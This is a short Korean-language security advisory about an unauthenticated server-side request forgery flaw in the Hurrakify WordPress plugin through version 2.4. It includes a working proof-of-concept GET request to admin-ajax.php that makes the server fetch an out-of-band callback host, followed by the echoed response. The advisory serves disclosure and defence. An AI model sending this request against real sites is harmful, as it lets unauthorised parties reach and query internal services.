
Hurrakify <= 2.4 - 비인증 서버 측 요청 위조(SSRF)
Hurrakify <= 2.4 - 인증되지 않은 서버 측 요청 위조(SSRF)
WordPress용 Hurrakify 플러그인은 2.4를 포함한 모든 버전에서 서버 측 요청 위조(SSRF) 취약점에 노출됩니다. 이로 인해 인증되지 않은 공격자가 웹 애플리케이션에서 시작되는 임의의 위치로 웹 요청을 보낼 수 있으며, 이를 통해 내부 서비스의 정보를 조회하거나 수정할 수 있습니다.
GET /wp-admin/admin-ajax.php?action=hurraki_tooltip_proxy&target=http%3A%2F%2Fqrl9eu4dot1s941aio2eom17oyupif64.oast.site HTTP/2
Host: wp-dev.ddev.site
<html><body>bfdibc85r04ky96cie05dfzjjgigz</body></html>